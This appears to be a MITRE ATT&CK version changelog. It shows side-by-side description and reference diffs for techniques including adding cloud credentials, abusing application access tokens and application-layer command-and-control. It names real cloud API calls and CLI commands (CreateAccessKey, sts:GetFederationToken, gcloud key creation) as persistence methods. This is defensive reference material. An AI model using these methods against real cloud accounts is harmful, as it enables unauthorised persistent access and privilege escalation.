contacting third-party web services or acquiring infrastructure to support [Proxy](https://attack.mitre.org/techniques/T1090).(Citation: amnesty_nso_pegasus) Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.
external_references[1]['source_name']TrendmicroHideoutsLeaseamnesty_nso_pegasus
external_references[1]['description']Max Goncharov. (2015, July 15). Criminal Hideouts for Lease: Bulletproof Hosting Services. Retrieved March 6, 2017.Amnesty International Security Lab. (2021, July 18). Forensic Methodology Report: How to catch NSO Group’s Pegasus. Retrieved February 22, 2022.
external_references[1]['url']https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdfhttps://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-how-to-catch-nso-groups-pegasus/
external_references[2]['source_name']ThreatConnect Infrastructure Dec 2020Koczwara Beacon Hunting Sep 2021
external_references[2]['description']ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with Shodan. Retrieved October 12, 2021.
external_references[2]['url']https://threatconnect.com/blog/infrastructure-research-hunting/https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
external_references[3]['source_name']Mandiant SCANdalous Jul 2020TrendmicroHideoutsLease
external_references[3]['description']Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved October 12, 2021.Max Goncharov. (2015, July 15). Criminal Hideouts for Lease: Bulletproof Hosting Services. Retrieved March 6, 2017.
external_references[3]['url']https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automationhttps://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
external_references[4]['source_name']Koczwara Beacon Hunting Sep 2021Mandiant SCANdalous Jul 2020
external_references[4]['description']Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with Shodan. Retrieved October 12, 2021.Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved October 12, 2021.
external_references[4]['url']https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
x_mitre_data_sources[1]Domain Name: Domain RegistrationDomain Name: Active DNS
x_mitre_data_sources[4]Domain Name: Active DNSDomain Name: Domain Registration
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'ThreatConnect Infrastructure Dec 2020', 'description': 'ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.', 'url': 'https://threatconnect.com/blog/infrastructure-research-hunting/'}

[T1098.001] Account Manipulation: Additional Cloud Credentials

Current version: 2.5

Version changed from: 2.4 → 2.5


Old Description
New Description
t1Adversaries may add adversary-controlled credentials to a clt1Adversaries may add adversary-controlled credentials to a cl
>oud account to maintain persistent access to victim accounts>oud account to maintain persistent access to victim accounts
> and instances within the environment.  For example, adversa> and instances within the environment.  For example, adversa
>ries may add credentials for Service Principals and Applicat>ries may add credentials for Service Principals and Applicat
>ions in addition to existing legitimate credentials in Azure>ions in addition to existing legitimate credentials in Azure
> AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citat> AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citat
>ion: Blue Cloud of Death)(Citation: Blue Cloud of Death Vide>ion: Blue Cloud of Death)(Citation: Blue Cloud of Death Vide
>o) These credentials include both x509 keys and passwords.(C>o) These credentials include both x509 keys and passwords.(C
>itation: Microsoft SolarWinds Customer Guidance) With suffic>itation: Microsoft SolarWinds Customer Guidance) With suffic
>ient permissions, there are a variety of ways to add credent>ient permissions, there are a variety of ways to add credent
>ials including the Azure Portal, Azure command line interfac>ials including the Azure Portal, Azure command line interfac
>e, and Azure or Az PowerShell modules.(Citation: Demystifyin>e, and Azure or Az PowerShell modules.(Citation: Demystifyin
>g Azure AD Service Principals)  In infrastructure-as-a-servi>g Azure AD Service Principals)  In infrastructure-as-a-servi
>ce (IaaS) environments, after gaining access through [Cloud >ce (IaaS) environments, after gaining access through [Cloud 
>Accounts](https://attack.mitre.org/techniques/T1078/004), ad>Accounts](https://attack.mitre.org/techniques/T1078/004), ad
>versaries may generate or import their own SSH keys using ei>versaries may generate or import their own SSH keys using ei
>ther the <code>CreateKeyPair</code> or <code>ImportKeyPair</>ther the <code>CreateKeyPair</code> or <code>ImportKeyPair</
>code> API in AWS or the <code>gcloud compute os-login ssh-ke>code> API in AWS or the <code>gcloud compute os-login ssh-ke
>ys add</code> command in GCP.(Citation: GCP SSH Key Add) Thi>ys add</code> command in GCP.(Citation: GCP SSH Key Add) Thi
>s allows persistent access to instances within the cloud env>s allows persistent access to instances within the cloud env
>ironment without further usage of the compromised cloud acco>ironment without further usage of the compromised cloud acco
>unts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind>unts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind
> the Scenes)  Adversaries may also use the <code>CreateAcces> the Scenes)  Adversaries may also use the <code>CreateAcces
>sKey</code> API in AWS or the <code>gcloud iam service-accou>sKey</code> API in AWS or the <code>gcloud iam service-accou
>nts keys create</code> command in GCP to add access keys to >nts keys create</code> command in GCP to add access keys to 
>an account. If the target account has different permissions >an account. If the target account has different permissions 
>from the requesting account, the adversary may also be able >from the requesting account, the adversary may also be able 
>to escalate their privileges in the environment (i.e. [Cloud>to escalate their privileges in the environment (i.e. [Cloud
> Accounts](https://attack.mitre.org/techniques/T1078/004)).(> Accounts](https://attack.mitre.org/techniques/T1078/004)).(
>Citation: Rhino Security Labs AWS Privilege Escalation)>Citation: Rhino Security Labs AWS Privilege Escalation)  In 
 >AWS environments, adversaries with the appropriate permissio
 >ns may also use the `sts:GetFederationToken` API call to cre
 >ate a temporary set of credentials tied to the permissions o
 >f the original user account. These credentials may remain va
 >lid for the duration of their lifetime even if the original 
 >account’s API credentials are deactivated. (Citation: Crowds
 >trike AWS User Federation Persistence)

Dropped Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:20:47.020000+00:002023-04-12 21:30:31.151000+00:00
descriptionAdversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment. For example, adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals) In infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the CreateKeyPair or ImportKeyPair API in AWS or the gcloud compute os-login ssh-keys add command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes) Adversaries may also use the CreateAccessKey API in AWS or the gcloud iam service-accounts keys create command in GCP to add access keys to an account. If the target account has different permissions from the requesting account, the adversary may also be able to escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation: Rhino Security Labs AWS Privilege Escalation)Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment. For example, adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals) In infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the CreateKeyPair or ImportKeyPair API in AWS or the gcloud compute os-login ssh-keys add command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes) Adversaries may also use the CreateAccessKey API in AWS or the gcloud iam service-accounts keys create command in GCP to add access keys to an account. If the target account has different permissions from the requesting account, the adversary may also be able to escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation: Rhino Security Labs AWS Privilege Escalation) In AWS environments, adversaries with the appropriate permissions may also use the `sts:GetFederationToken` API call to create a temporary set of credentials tied to the permissions of the original user account. These credentials may remain valid for the duration of their lifetime even if the original account’s API credentials are deactivated. (Citation: Crowdstrike AWS User Federation Persistence)
external_references[1]['source_name']Expel IO Evil in AWSCrowdstrike AWS User Federation Persistence
external_references[1]['description']A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding Evil in AWS. Retrieved June 25, 2020. Vaishnav Murthy and Joel Eng. (2023, January 30). How Adversaries Can Persist with AWS User Federation. Retrieved March 10, 2023.
external_references[1]['url']https://expel.io/blog/finding-evil-in-aws/https://www.crowdstrike.com/blog/how-adversaries-persist-with-aws-user-federation/
external_references[2]['source_name']Demystifying Azure AD Service PrincipalsExpel IO Evil in AWS
external_references[2]['description']Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service Principals. Retrieved January 19, 2020.A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding Evil in AWS. Retrieved June 25, 2020.
external_references[2]['url']https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/https://expel.io/blog/finding-evil-in-aws/
external_references[3]['source_name']GCP SSH Key AddDemystifying Azure AD Service Principals
external_references[3]['description']Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved October 1, 2020.Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service Principals. Retrieved January 19, 2020.
external_references[3]['url']https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/addhttps://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
external_references[4]['source_name']Blue Cloud of Death VideoGCP SSH Key Add
external_references[4]['description']Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming Azure. Retrieved November 21, 2019.Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved October 1, 2020.
external_references[4]['url']https://www.youtube.com/watch?v=wQ1CuAPnrLM&feature=youtu.be&t=2815https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
external_references[5]['source_name']Blue Cloud of DeathBlue Cloud of Death Video
external_references[5]['description']Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming Azure. Retrieved October 23, 2019.Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming Azure. Retrieved November 21, 2019.
external_references[5]['url']https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1https://www.youtube.com/watch?v=wQ1CuAPnrLM&feature=youtu.be&t=2815
external_references[6]['source_name']Microsoft SolarWinds Customer GuidanceBlue Cloud of Death
external_references[6]['description']MSRC. (2020, December 13). Customer Guidance on Recent Nation-State Cyber Attacks. Retrieved December 17, 2020.Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming Azure. Retrieved October 23, 2019.
external_references[6]['url']https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
external_references[7]['source_name']Expel Behind the ScenesMicrosoft SolarWinds Customer Guidance
external_references[7]['description']S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020, July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved October 1, 2020.MSRC. (2020, December 13). Customer Guidance on Recent Nation-State Cyber Attacks. Retrieved December 17, 2020.
external_references[7]['url']https://expel.io/blog/behind-the-scenes-expel-soc-alert-aws/https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
external_references[8]['source_name']Rhino Security Labs AWS Privilege EscalationExpel Behind the Scenes
external_references[8]['description']Spencer Gietzen. (n.d.). AWS IAM Privilege Escalation – Methods and Mitigation. Retrieved May 27, 2022.S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020, July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved October 1, 2020.
external_references[8]['url']https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/https://expel.io/blog/behind-the-scenes-expel-soc-alert-aws/
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version2.42.5
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Rhino Security Labs AWS Privilege Escalation', 'description': 'Spencer Gietzen. (n.d.). AWS IAM Privilege Escalation – Methods and Mitigation. Retrieved May 27, 2022.', 'url': 'https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/'}
x_mitre_contributorsDylan
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesActive Directory: Active Directory Object Modification

[T1098.003] Account Manipulation: Additional Cloud Roles

Current version: 2.2

Version changed from: 2.1 → 2.2

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:21:19.955000+00:002023-04-14 22:48:50.142000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version2.12.2

[T1546.010] Event Triggered Execution: AppInit DLLs

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-11-10 18:29:31.076000+00:002023-04-21 12:33:45.568000+00:00
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesWindows Registry: Windows Registry Key Modification
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesWindows Registry: Windows Registry Key Modification

[T1550.001] Use Alternate Authentication Material: Application Access Token

Current version: 1.5

Version changed from: 1.4 → 1.5


Old Description
New Description
t1Adversaries may use stolen application access tokens to bypat1Adversaries may use stolen application access tokens to bypa
>ss the typical authentication process and access restricted >ss the typical authentication process and access restricted 
>accounts, information, or services on remote systems. These >accounts, information, or services on remote systems. These 
>tokens are typically stolen from users or services and used >tokens are typically stolen from users or services and used 
>in lieu of login credentials.  Application access tokens are>in lieu of login credentials.  Application access tokens are
> used to make authorized API requests on behalf of a user or> used to make authorized API requests on behalf of a user or
> service and are commonly used as a way to access resources > service and are commonly used to access resources in cloud,
>in cloud and container-based applications and software-as-a-> container-based applications, and software-as-a-service (Sa
>service (SaaS).(Citation: Auth0 - Why You Should Always Use >aS).(Citation: Auth0 - Why You Should Always Use Access Toke
>Access Tokens to Secure APIs Sept 2019)   In AWS and GCP env>ns to Secure APIs Sept 2019)   OAuth is one commonly impleme
>ironments, adversaries can trigger a request for a short-liv>nted framework that issues tokens to users for access to sys
>ed access token with the privileges of another user account.>tems. These frameworks are used collaboratively to verify th
>(Citation: Google Cloud Service Account Credentials)(Citatio>e user and determine what actions the user is allowed to per
>n: AWS Temporary Security Credentials) The adversary can the>form. Once identity is established, the token allows actions
>n use this token to request data or perform actions the orig> to be authorized, without passing the actual credentials of
>inal account could not. If permissions for this feature are > the user. Therefore, compromise of the token can grant the 
>misconfigured – for example, by allowing all users to reques>adversary access to resources of other sites through a malic
>t a token for a particular account - an adversary may be abl>ious application.(Citation: okta)  For example, with a cloud
>e to gain initial access to a Cloud Account or escalate thei>-based email service, once an OAuth access token is granted 
>r privileges.(Citation: Rhino Security Labs Enumerating AWS >to a malicious application, it can potentially gain long-ter
>Roles)  OAuth is one commonly implemented framework that iss>m access to features of the user account if a "refresh" toke
>ues tokens to users for access to systems. These frameworks >n enabling background access is awarded.(Citation: Microsoft
>are used collaboratively to verify the user and determine wh> Identity Platform Access 2019) With an OAuth access token a
>at actions the user is allowed to perform. Once identity is >n adversary can use the user-granted REST API to perform fun
>established, the token allows actions to be authorized, with>ctions such as email searching and contact enumeration.(Cita
>out passing the actual credentials of the user. Therefore, c>tion: Staaldraad Phishing with OAuth 2017)  Compromised acce
>ompromise of the token can grant the adversary access to res>ss tokens may be used as an initial step in compromising oth
>ources of other sites through a malicious application.(Citat>er services. For example, if a token grants access to a vict
>ion: okta)  For example, with a cloud-based email service on>im’s primary email, the adversary may be able to extend acce
>ce an OAuth access token is granted to a malicious applicati>ss to all other services which the target subscribes by trig
>on, it can potentially gain long-term access to features of >gering forgotten password routines. In AWS and GCP environme
>the user account if a "refresh" token enabling background ac>nts, adversaries can trigger a request for a short-lived acc
>cess is awarded.(Citation: Microsoft Identity Platform Acces>ess token with the privileges of another user account.(Citat
>s 2019) With an OAuth access token an adversary can use the >ion: Google Cloud Service Account Credentials)(Citation: AWS
>user-granted REST API to perform functions such as email sea> Temporary Security Credentials) The adversary can then use 
>rching and contact enumeration.(Citation: Staaldraad Phishin>this token to request data or perform actions the original a
>g with OAuth 2017)  Compromised access tokens may be used as>ccount could not. If permissions for this feature are miscon
> an initial step in compromising other services. For example>figured – for example, by allowing all users to request a to
>, if a token grants access to a victim’s primary email, the >ken for a particular account - an adversary may be able to g
>adversary may be able to extend access to all other services>ain initial access to a Cloud Account or escalate their priv
> which the target subscribes by triggering forgotten passwor>ileges.(Citation: Rhino Security Labs Enumerating AWS Roles)
>d routines. Direct API access through a token negates the ef>  Direct API access through a token negates the effectivenes
>fectiveness of a second authentication factor and may be imm>s of a second authentication factor and may be immune to int
>une to intuitive countermeasures like changing passwords. Ac>uitive countermeasures like changing passwords.  For example
>cess abuse over an API channel can be difficult to detect ev>, in AWS environments, an adversary who compromises a user’s
>en from the service provider end, as the access can still al> AWS API credentials may be able to use the `sts:GetFederati
>ign well with a legitimate workflow.>onToken` API call to create a federated user session, which 
 >will have the same permissions as the original user but may 
 >persist even if the original user credentials are deactivate
 >d.(Citation: Crowdstrike AWS User Federation Persistence) Ad
 >ditionally, access abuse over an API channel can be difficul
 >t to detect even from the service provider end, as the acces
 >s can still align well with a legitimate workflow.
Details
dictionary_item_added
STIX FieldOld valueNew Value
external_referencesStalmans, E.. (2017, August 2). Phishing with OAuth and o365/Azure. Retrieved October 4, 2019.
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-593
values_changed
STIX FieldOld valueNew Value
modified2022-10-21 17:01:05.286000+00:002023-04-15 00:29:43.297000+00:00
descriptionAdversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users or services and used in lieu of login credentials. Application access tokens are used to make authorized API requests on behalf of a user or service and are commonly used as a way to access resources in cloud and container-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) In AWS and GCP environments, adversaries can trigger a request for a short-lived access token with the privileges of another user account.(Citation: Google Cloud Service Account Credentials)(Citation: AWS Temporary Security Credentials) The adversary can then use this token to request data or perform actions the original account could not. If permissions for this feature are misconfigured – for example, by allowing all users to request a token for a particular account - an adversary may be able to gain initial access to a Cloud Account or escalate their privileges.(Citation: Rhino Security Labs Enumerating AWS Roles) OAuth is one commonly implemented framework that issues tokens to users for access to systems. These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform. Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user. Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application.(Citation: okta) For example, with a cloud-based email service once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a "refresh" token enabling background access is awarded.(Citation: Microsoft Identity Platform Access 2019) With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.(Citation: Staaldraad Phishing with OAuth 2017) Compromised access tokens may be used as an initial step in compromising other services. For example, if a token grants access to a victim’s primary email, the adversary may be able to extend access to all other services which the target subscribes by triggering forgotten password routines. Direct API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords. Access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow.Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users or services and used in lieu of login credentials. Application access tokens are used to make authorized API requests on behalf of a user or service and are commonly used to access resources in cloud, container-based applications, and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework that issues tokens to users for access to systems. These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform. Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user. Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application.(Citation: okta) For example, with a cloud-based email service, once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a "refresh" token enabling background access is awarded.(Citation: Microsoft Identity Platform Access 2019) With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.(Citation: Staaldraad Phishing with OAuth 2017) Compromised access tokens may be used as an initial step in compromising other services. For example, if a token grants access to a victim’s primary email, the adversary may be able to extend access to all other services which the target subscribes by triggering forgotten password routines. In AWS and GCP environments, adversaries can trigger a request for a short-lived access token with the privileges of another user account.(Citation: Google Cloud Service Account Credentials)(Citation: AWS Temporary Security Credentials) The adversary can then use this token to request data or perform actions the original account could not. If permissions for this feature are misconfigured – for example, by allowing all users to request a token for a particular account - an adversary may be able to gain initial access to a Cloud Account or escalate their privileges.(Citation: Rhino Security Labs Enumerating AWS Roles) Direct API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords. For example, in AWS environments, an adversary who compromises a user’s AWS API credentials may be able to use the `sts:GetFederationToken` API call to create a federated user session, which will have the same permissions as the original user but may persist even if the original user credentials are deactivated.(Citation: Crowdstrike AWS User Federation Persistence) Additionally, access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow.
external_references[1]['source_name']Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019Crowdstrike AWS User Federation Persistence
external_references[1]['description']Auth0. (n.d.). Why You Should Always Use Access Tokens to Secure APIs. Retrieved September 12, 2019. Vaishnav Murthy and Joel Eng. (2023, January 30). How Adversaries Can Persist with AWS User Federation. Retrieved March 10, 2023.
external_references[1]['url']https://auth0.com/blog/why-should-use-accesstokens-to-secure-an-api/https://www.crowdstrike.com/blog/how-adversaries-persist-with-aws-user-federation/
external_references[2]['source_name']AWS Logging IAM CallsAuth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019
external_references[2]['description']AWS. (n.d.). Logging IAM and AWS STS API calls with AWS CloudTrail. Retrieved April 1, 2022.Auth0. (n.d.). Why You Should Always Use Access Tokens to Secure APIs. Retrieved September 12, 2019.
external_references[2]['url']https://docs.aws.amazon.com/IAM/latest/UserGuide/cloudtrail-integration.htmlhttps://auth0.com/blog/why-should-use-accesstokens-to-secure-an-api/
external_references[3]['source_name']AWS Temporary Security CredentialsAWS Logging IAM Calls
external_references[3]['description']AWS. (n.d.). Requesting temporary security credentials. Retrieved April 1, 2022.AWS. (n.d.). Logging IAM and AWS STS API calls with AWS CloudTrail. Retrieved April 1, 2022.
external_references[3]['url']https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp_request.htmlhttps://docs.aws.amazon.com/IAM/latest/UserGuide/cloudtrail-integration.html
external_references[4]['source_name']Microsoft Identity Platform Access 2019AWS Temporary Security Credentials
external_references[4]['description']Cai, S., Flores, J., de Guzman, C., et. al.. (2019, August 27). Microsoft identity platform access tokens. Retrieved October 4, 2019.AWS. (n.d.). Requesting temporary security credentials. Retrieved April 1, 2022.
external_references[4]['url']https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokenshttps://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp_request.html
external_references[5]['source_name']Google Cloud Service Account CredentialsMicrosoft Identity Platform Access 2019
external_references[5]['description']Google Cloud. (2022, March 31). Creating short-lived service account credentials. Retrieved April 1, 2022.Cai, S., Flores, J., de Guzman, C., et. al.. (2019, August 27). Microsoft identity platform access tokens. Retrieved October 4, 2019.
external_references[5]['url']https://cloud.google.com/iam/docs/creating-short-lived-service-account-credentialshttps://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens
external_references[6]['source_name']GCP Monitoring Service Account UsageGoogle Cloud Service Account Credentials
external_references[6]['description']Google Cloud. (2022, March 31). Monitor usage patterns for service accounts and keys . Retrieved April 1, 2022.Google Cloud. (2022, March 31). Creating short-lived service account credentials. Retrieved April 1, 2022.
external_references[6]['url']https://cloud.google.com/iam/docs/service-account-monitoringhttps://cloud.google.com/iam/docs/creating-short-lived-service-account-credentials
external_references[7]['source_name']oktaGCP Monitoring Service Account Usage
external_references[7]['description']okta. (n.d.). What Happens If Your JWT Is Stolen?. Retrieved September 12, 2019.Google Cloud. (2022, March 31). Monitor usage patterns for service accounts and keys . Retrieved April 1, 2022.
external_references[7]['url']https://developer.okta.com/blog/2018/06/20/what-happens-if-your-jwt-is-stolenhttps://cloud.google.com/iam/docs/service-account-monitoring
external_references[8]['source_name']Rhino Security Labs Enumerating AWS Rolesokta
external_references[8]['description']Spencer Gietzen. (2018, August 8). Assume the Worst: Enumerating AWS Roles through ‘AssumeRole’. Retrieved April 1, 2022.okta. (n.d.). What Happens If Your JWT Is Stolen?. Retrieved September 12, 2019.
external_references[8]['url']https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumerationhttps://developer.okta.com/blog/2018/06/20/what-happens-if-your-jwt-is-stolen
external_references[9]['source_name']Staaldraad Phishing with OAuth 2017Rhino Security Labs Enumerating AWS Roles
external_references[9]['description']Stalmans, E.. (2017, August 2). Phishing with OAuth and o365/Azure. Retrieved October 4, 2019.Spencer Gietzen. (2018, August 8). Assume the Worst: Enumerating AWS Roles through ‘AssumeRole’. Retrieved April 1, 2022.
external_references[9]['url']https://staaldraad.github.io/2017/08/02/o356-phishing-with-oauth/https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration
external_references[10]['source_name']capecStaaldraad Phishing with OAuth 2017
external_references[10]['url']https://capec.mitre.org/data/definitions/593.htmlhttps://staaldraad.github.io/2017/08/02/o356-phishing-with-oauth/
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.41.5
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsDylan

[T1071] Application Layer Protocol

Current version: 2.1

Version changed from: 2.0 → 2.1


Old Description
New Description
t1Adversaries may communicate using application layer protocolt1Adversaries may communicate using OSI application layer prot
>s to avoid detection/network filtering by blending in with e>ocols to avoid detection/network filtering by blending in wi
>xisting traffic. Commands to the remote system, and often th>th existing traffic. Commands to the remote system, and ofte
>e results of those commands, will be embedded within the pro>n the results of those commands, will be embedded within the
>tocol traffic between the client and server.   Adversaries m> protocol traffic between the client and server.   Adversari
>ay utilize many different protocols, including those used fo>es may utilize many different protocols, including those use
>r web browsing, transferring files, electronic mail, or DNS.>d for web browsing, transferring files, electronic mail, or 
> For connections that occur internally within an enclave (su>DNS. For connections that occur internally within an enclave
>ch as those between a proxy or pivot node and other nodes), > (such as those between a proxy or pivot node and other node
>commonly used protocols are SMB, SSH, or RDP. >s), commonly used protocols are SMB, SSH, or RDP. 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_contributors['Duane Michael']
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-10-21 16:35:45.986000+00:002023-04-11 14:35:41.468000+00:00
descriptionAdversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. Adversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP. Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. Adversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.
x_mitre_data_sources[0]Network Traffic: Network Traffic FlowNetwork Traffic: Network Traffic Content
x_mitre_data_sources[1]Network Traffic: Network Traffic ContentNetwork Traffic: Network Traffic Flow
x_mitre_version2.02.1

[T1010] Application Window Discovery

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
New Description
t1Adversaries may attempt to get a listing of open applicationt1Adversaries may attempt to get a listing of open application
> windows. Window listings could convey information about how> windows. Window listings could convey information about how
> the system is used or give context to information collected> the system is used.(Citation: Prevailion DarkWatchman 2021)
> by a keylogger.(Citation: Prevailion DarkWatchman 2021)> For example, information about application windows could be
 > used identify potential data to collect as well as identify
 >ing security tooling ([Security Software Discovery](https://
 >attack.mitre.org/techniques/T1518/001)) to evade.(Citation: 
 >ESET Grandoreiro April 2020)  Adversaries typically abuse sy
 >stem features for this type of enumeration. For example, the
 >y may gather information through native system features such
 > as [Command and Scripting Interpreter](https://attack.mitre
 >.org/techniques/T1059) commands and [Native API](https://att
 >ack.mitre.org/techniques/T1106) functions.

Dropped Mitigations:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-19 02:07:41.751000+00:002023-04-15 16:46:04.776000+00:00
